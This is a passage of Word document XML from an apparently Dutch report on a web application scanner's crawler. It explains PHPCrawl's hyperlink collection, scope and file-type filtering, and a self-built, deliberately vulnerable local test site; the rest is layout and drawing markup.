                          <w:ilvl w:val="0"/>
                          <w:numId w:val="17"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Host (Glossary, host)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4301508C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="17"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Server</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="247BD411" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="17"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Status code/protocol</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3D835569" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="17"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Content lengte</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="727070B0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="17"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Connectie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D797D3D" w14:textId="62FCDC5F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="17"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Content type</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A94F94" w:rsidRPr="00716C78">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A94F94" w:rsidRPr="00716C78">
        <w:t xml:space="preserve"> ve</w:t>
      </w:r>
      <w:r w:rsidR="00A94F94">
        <w:t>rzamelt zowel naast hyperlinks ook algemene data over de website</w:t>
      </w:r>
      <w:r w:rsidR="00230446">
        <w:t xml:space="preserve">, dit vindt de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00230446">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00230446">
        <w:t xml:space="preserve"> meestal in de response header die het terug krijgt van de server. </w:t>
      </w:r>
      <w:r w:rsidR="005E1BD2">
        <w:t xml:space="preserve">Maar de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E1BD2">
        <w:t>Crawlers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E1BD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00600B97">
        <w:t>hoofddoel</w:t>
      </w:r>
      <w:r w:rsidR="005E1BD2">
        <w:t xml:space="preserve"> is om hyperli</w:t>
      </w:r>
      <w:r w:rsidR="008A1D7F">
        <w:t xml:space="preserve">nk te verzamelen om deze later voor andere doeleindes te gebruiken. </w:t>
      </w:r>
      <w:r w:rsidR="00776EDA">
        <w:t xml:space="preserve">Hyperlinks </w:t>
      </w:r>
      <w:r w:rsidR="008E50ED">
        <w:t xml:space="preserve">hebben een centrale rol bij het verrichten van </w:t>
      </w:r>
      <w:r w:rsidR="007A0EA7">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="002210FF">
        <w:t xml:space="preserve"> scans en het is dus praktisch om zoveel mogelijk meta data te verzamelen over hyperlinks.</w:t>
      </w:r>
      <w:r w:rsidR="007F25AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D7399F">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D7399F">
        <w:t xml:space="preserve"> beperkt zich wel alleen tot het verzamelen van </w:t>
      </w:r>
      <w:r w:rsidR="001A59E3">
        <w:t>GET-parameter</w:t>
      </w:r>
      <w:r w:rsidR="00B53DC5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A752B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B27013">
        <w:t xml:space="preserve">De reden hiervoor is omdat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B27013">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B27013">
        <w:t xml:space="preserve"> niet gebouwd is om </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C451F">
        <w:t>POST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C451F">
        <w:t xml:space="preserve"> parameters eruit te filteren, het zou wel kunnen maar dan zal ik maatwerk moeten toepassen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ED947C" w14:textId="6365FA9D" w:rsidR="00CA5B2C" w:rsidRPr="00CA5B2C" w:rsidRDefault="00CA5B2C" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5B2C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Filteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B78A4" w14:textId="1456D237" w:rsidR="004F2C24" w:rsidRDefault="0063018A" w:rsidP="004F2C24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Een </w:t>
      </w:r>
      <w:r w:rsidR="003714D8">
        <w:t>belangrijk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aspect van Crawlen naar URL’s is het filteren ervan. </w:t>
      </w:r>
      <w:r w:rsidR="00CA5B2C">
        <w:t>Er kunnen een variatie van hyperlinks op een website te vinden zijn. Hyperlinks die buiten de scope vallen, de scope configureerbaar, worden eruit gefilterd. Hyperlink die niet voldoe</w:t>
      </w:r>
      <w:r w:rsidR="00144F21">
        <w:t>n aan de juiste type</w:t>
      </w:r>
      <w:r w:rsidR="005E0B45">
        <w:t>/soort</w:t>
      </w:r>
      <w:r w:rsidR="00144F21">
        <w:t xml:space="preserve"> van een worden er ook uitgefilterd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C21F23" w14:textId="3078FE00" w:rsidR="00C43788" w:rsidRPr="00171076" w:rsidRDefault="00171076" w:rsidP="004F2C24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171076">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voorbeeld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036179A4" w14:textId="3A904BF5" w:rsidR="008248FB" w:rsidRDefault="00FB5278" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Website</w:t>
      </w:r>
      <w:r w:rsidR="00EE4970">
        <w:t>: www.nieuws</w:t>
      </w:r>
      <w:r w:rsidR="003B04CD">
        <w:t>.nl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB51ABF" w14:textId="5CE95B7D" w:rsidR="00171076" w:rsidRDefault="00BA1780" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scope: domein niveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E90AE3A" w14:textId="21AAC56E" w:rsidR="0065472E" w:rsidRDefault="00102A86" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filter: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, jpg</w:t>
      </w:r>
      <w:r w:rsidR="0065472E">
        <w:t>, gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCACBC" w14:textId="1BFFA755" w:rsidR="00F84AF7" w:rsidRDefault="0065472E" w:rsidP="00A622C1">
      <w:r>
        <w:t>Alle hyperlinks die buiten het domein vallen worden eruit gefilterd en ook de aangegeven bestand types</w:t>
      </w:r>
      <w:r w:rsidR="00F84AF7">
        <w:t>. De volgende links worden eruit gefilterd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A2276" w14:textId="6D526541" w:rsidR="00FD1F54" w:rsidRDefault="00E97057" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A396E">
        <w:t>www.nieuws.nl/style.css</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="12A746C8" w14:textId="3513BDD7" w:rsidR="00E97057" w:rsidRDefault="00E97057" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A396E">
        <w:t>www.nieuws.nl/afbeelding.jpg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A1810F3" w14:textId="3B5E71A6" w:rsidR="00E97057" w:rsidRDefault="009A396E" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A396E">
        <w:t>www.twitter.com/nieuws</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B7E96D2" w14:textId="77777777" w:rsidR="00093460" w:rsidRDefault="00093460">
      <w:r>
        <w:t>Geldige hyperlinks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306BF25F" w14:textId="05705E2D" w:rsidR="00F45E04" w:rsidRDefault="00F45E04" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F45E04">
        <w:t>www.</w:t>
      </w:r>
      <w:r>
        <w:t>nieuws.nl/</w:t>
      </w:r>
      <w:r w:rsidR="005F4095">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="59DEF7F7" w14:textId="64D588F8" w:rsidR="00F45E04" w:rsidRDefault="00F45E04" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A613AF">
        <w:t>www.nieuws.nl/over-ons</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6341EB65" w14:textId="029BEAAA" w:rsidR="00093460" w:rsidRDefault="00F45E04" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>www.nieuws.nl/binnenland</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00093460">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15414922" w14:textId="761402B5" w:rsidR="0041455B" w:rsidRPr="00956350" w:rsidRDefault="00956350">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956350">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Voorbeeld met broncode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48432AAF" w14:textId="77777777" w:rsidR="001A4C84" w:rsidRDefault="000262FC" w:rsidP="009A396E">
      <w:r>
        <w:t xml:space="preserve">Dit het volgende voorbeeld zal ik illustreren wat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aan data verzameld. </w:t>
      </w:r>
      <w:r w:rsidR="000D6B79">
        <w:t xml:space="preserve">Dit zal het concept van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D6B79">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D6B79">
        <w:t xml:space="preserve"> nog duidelijker maken omdat we precies zien wat de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D6B79">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D6B79">
        <w:t xml:space="preserve"> aan content analyseert.</w:t>
      </w:r>
      <w:r w:rsidR="002C5954">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAD8BDE" w14:textId="12DBA73B" w:rsidR="001A4C84" w:rsidRPr="001A4C84" w:rsidRDefault="001A4C84" w:rsidP="009A396E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A4C84">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hackableweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="632ACBC2" w14:textId="7A433146" w:rsidR="000454D3" w:rsidRDefault="002C5954" w:rsidP="009A396E">
      <w:r>
        <w:t>Voor het voorbeeld gebruik ik mijn eigen gemaakte website</w:t>
      </w:r>
      <w:r w:rsidR="00CF6A2A">
        <w:t xml:space="preserve">, deze noem ik </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF6A2A">
        <w:t>Hackableweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF6A2A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF6A2A">
        <w:t>Hackableweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF6A2A">
        <w:t xml:space="preserve"> is een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CF6A2A">
        <w:t>PHP website</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CF6A2A">
        <w:t xml:space="preserve"> dat special gemaakt is voor het testen van </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00CF6A2A">
        <w:t xml:space="preserve"> scanners.</w:t>
      </w:r>
      <w:r w:rsidR="00E61ADB">
        <w:t xml:space="preserve"> Het heet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E61ADB">
        <w:t>Hackableweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E61ADB">
        <w:t xml:space="preserve"> omdat de website makkelijk te hacken is, het voordeel die ik heb bij een zelf ontwikkelde website is dat ik kennis heb over hoe het gebouwd is.</w:t>
      </w:r>
      <w:r w:rsidR="001E0514">
        <w:t xml:space="preserve"> Deze website draai ik in mijn eigen lokale omgeving en sinds ik het zelf heb ontwikkeld schend ik geen copyright rechten. </w:t>
      </w:r>
      <w:r w:rsidR="00E61ADB">
        <w:t xml:space="preserve">Ik heb ervoor gezorgd dat de website kwetsbaar is voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E61ADB">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D06FE4">
        <w:t xml:space="preserve">, XSS en ander soort aanvallen. </w:t>
      </w:r>
      <w:r w:rsidR="001A4C84">
        <w:t xml:space="preserve">Zo kan ik meten hoe goed de </w:t>
      </w:r>
      <w:r w:rsidR="001E0514">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="001A4C84">
        <w:t xml:space="preserve"> scanner werkt. Ik zal in de realisatie hoofdstuk test cases maken met gebruik van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A4C84">
        <w:t>Hackableweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A4C84">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE128A5" w14:textId="7EBAC85C" w:rsidR="00D91191" w:rsidRDefault="006E50E0" w:rsidP="009A396E">
      <w:r>
        <w:t xml:space="preserve">In figuur 4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00447797">
        <w:t xml:space="preserve">wordt </w:t>
      </w:r>
      <w:r w:rsidR="002C305A">
        <w:t>een HTML-pagina geïllustreerd</w:t>
      </w:r>
      <w:r w:rsidR="00E43404">
        <w:t>, iets wat de</w:t>
      </w:r>
      <w:r w:rsidR="00447797">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00447797">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00447797">
        <w:t xml:space="preserve"> zou </w:t>
      </w:r>
      <w:r w:rsidR="00E43404">
        <w:t>kunnen verwerken.</w:t>
      </w:r>
      <w:r w:rsidR="00EC469C">
        <w:t xml:space="preserve"> In dit voorbee</w:t>
      </w:r>
      <w:r w:rsidR="00B81A80">
        <w:t>ld zal ik met de</w:t>
      </w:r>
      <w:r w:rsidR="00EC469C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F052B8">
        <w:t>volgende</w:t>
      </w:r>
      <w:r w:rsidR="00EC469C">
        <w:t xml:space="preserve"> configuratie van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC469C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC469C">
        <w:t xml:space="preserve"> de hyperlinks markeren die verzameld</w:t>
      </w:r>
      <w:r w:rsidR="00935763">
        <w:t>(blauw)</w:t>
      </w:r>
      <w:r w:rsidR="00EC469C">
        <w:t xml:space="preserve"> en eruit gefilterd</w:t>
      </w:r>
      <w:r w:rsidR="00935763">
        <w:t>(geel)</w:t>
      </w:r>
      <w:r w:rsidR="00EC469C">
        <w:t xml:space="preserve"> worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BABAA2" w14:textId="426FBFAC" w:rsidR="00904D93" w:rsidRPr="00CC5B8C" w:rsidRDefault="00904D93" w:rsidP="009A396E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5B8C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Configuratie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C71B0E" w14:textId="6A5B1649" w:rsidR="0087369E" w:rsidRDefault="0087369E" w:rsidP="009A396E">
      <w:r>
        <w:t>Website: localhost:8888</w:t>
      </w:r>
      <w:r w:rsidR="00DB4C49">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scope: domein niveau, filter: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, jpg, gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952308D" w14:textId="6C5E7009" w:rsidR="00EF1BFD" w:rsidRDefault="00EF4B25" w:rsidP="009A396E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251758592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EC361AE" wp14:editId="4D610079">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1716405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="908050" cy="184785"/>
                <wp:effectExtent l="0" t="0" r="57150" b="18415"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="14845"/>
                    <wp:lineTo x="1208" y="20784"/>
                    <wp:lineTo x="21751" y="20784"/>
                    <wp:lineTo x="22355" y="8907"/>
                    <wp:lineTo x="22355" y="0"/>
                    <wp:lineTo x="19334" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="5" name="Freeform 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="908050" cy="184785"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 78242 w 908236"/>
                            <a:gd name="connsiteY0" fmla="*/ 16082 h 184894"/>
                            <a:gd name="connsiteX1" fmla="*/ 7904 w 908236"/>
                            <a:gd name="connsiteY1" fmla="*/ 23116 h 184894"/>
                            <a:gd name="connsiteX2" fmla="*/ 870 w 908236"/>
                            <a:gd name="connsiteY2" fmla="*/ 44218 h 184894"/>
                            <a:gd name="connsiteX3" fmla="*/ 29005 w 908236"/>
                            <a:gd name="connsiteY3" fmla="*/ 86421 h 184894"/>
                            <a:gd name="connsiteX4" fmla="*/ 43073 w 908236"/>
                            <a:gd name="connsiteY4" fmla="*/ 107522 h 184894"/>
                            <a:gd name="connsiteX5" fmla="*/ 64175 w 908236"/>
                            <a:gd name="connsiteY5" fmla="*/ 149725 h 184894"/>
                            <a:gd name="connsiteX6" fmla="*/ 113412 w 908236"/>
                            <a:gd name="connsiteY6" fmla="*/ 163793 h 184894"/>
                            <a:gd name="connsiteX7" fmla="*/ 359596 w 908236"/>
                            <a:gd name="connsiteY7" fmla="*/ 170827 h 184894"/>
                            <a:gd name="connsiteX8" fmla="*/ 500273 w 908236"/>
                            <a:gd name="connsiteY8" fmla="*/ 177861 h 184894"/>
                            <a:gd name="connsiteX9" fmla="*/ 669085 w 908236"/>
                            <a:gd name="connsiteY9" fmla="*/ 184894 h 184894"/>
                            <a:gd name="connsiteX10" fmla="*/ 823830 w 908236"/>
                            <a:gd name="connsiteY10" fmla="*/ 177861 h 184894"/>
                            <a:gd name="connsiteX11" fmla="*/ 844932 w 908236"/>
                            <a:gd name="connsiteY11" fmla="*/ 170827 h 184894"/>
                            <a:gd name="connsiteX12" fmla="*/ 858999 w 908236"/>
                            <a:gd name="connsiteY12" fmla="*/ 149725 h 184894"/>
                            <a:gd name="connsiteX13" fmla="*/ 880101 w 908236"/>
                            <a:gd name="connsiteY13" fmla="*/ 135658 h 184894"/>
                            <a:gd name="connsiteX14" fmla="*/ 887135 w 908236"/>
                            <a:gd name="connsiteY14" fmla="*/ 114556 h 184894"/>
                            <a:gd name="connsiteX15" fmla="*/ 908236 w 908236"/>
                            <a:gd name="connsiteY15" fmla="*/ 72353 h 184894"/>
                            <a:gd name="connsiteX16" fmla="*/ 858999 w 908236"/>
                            <a:gd name="connsiteY16" fmla="*/ 44218 h 184894"/>
                            <a:gd name="connsiteX17" fmla="*/ 788661 w 908236"/>
                            <a:gd name="connsiteY17" fmla="*/ 30150 h 184894"/>
                            <a:gd name="connsiteX18" fmla="*/ 683153 w 908236"/>
                            <a:gd name="connsiteY18" fmla="*/ 16082 h 184894"/>
                            <a:gd name="connsiteX19" fmla="*/ 275190 w 908236"/>
                            <a:gd name="connsiteY19" fmla="*/ 2014 h 184894"/>
                            <a:gd name="connsiteX20" fmla="*/ 78242 w 908236"/>
                            <a:gd name="connsiteY20" fmla="*/ 16082 h 1848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908236" h="184894">
                              <a:moveTo>
                                <a:pt x="78242" y="16082"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="33694" y="19599"/>
                                <a:pt x="30048" y="15063"/>
                                <a:pt x="7904" y="23116"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="936" y="25650"/>
                                <a:pt x="-1475" y="37184"/>
                                <a:pt x="870" y="44218"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="6216" y="60258"/>
                                <a:pt x="19627" y="72353"/>
                                <a:pt x="29005" y="86421"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="43073" y="107522"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="47707" y="121424"/>
                                <a:pt x="51778" y="139808"/>
                                <a:pt x="64175" y="149725"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="68388" y="153096"/>
                                <a:pt x="112061" y="163724"/>
                                <a:pt x="113412" y="163793"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="195399" y="167998"/>
                                <a:pt x="277555" y="167844"/>
                                <a:pt x="359596" y="170827"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="406516" y="172533"/>
                                <a:pt x="453371" y="175729"/>
                                <a:pt x="500273" y="177861"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="669085" y="184894"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="720667" y="182550"/>
                                <a:pt x="772360" y="181978"/>
                                <a:pt x="823830" y="177861"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="831221" y="177270"/>
                                <a:pt x="839142" y="175459"/>
                                <a:pt x="844932" y="170827"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
